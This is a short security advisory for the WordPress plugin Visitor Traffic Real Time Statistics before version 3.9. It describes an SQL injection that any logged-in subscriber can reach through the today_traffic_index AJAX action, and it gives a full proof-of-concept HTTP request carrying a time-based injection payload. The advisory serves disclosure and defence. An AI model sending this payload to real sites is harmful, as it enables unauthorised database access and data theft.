Visitor Traffic Real Time Statistics < 3.9 - Subscriber+ SQL Injection

The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 129 Connection: close Cookie: [subscriber+] action=today_traffic_index&start;=0&length;=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);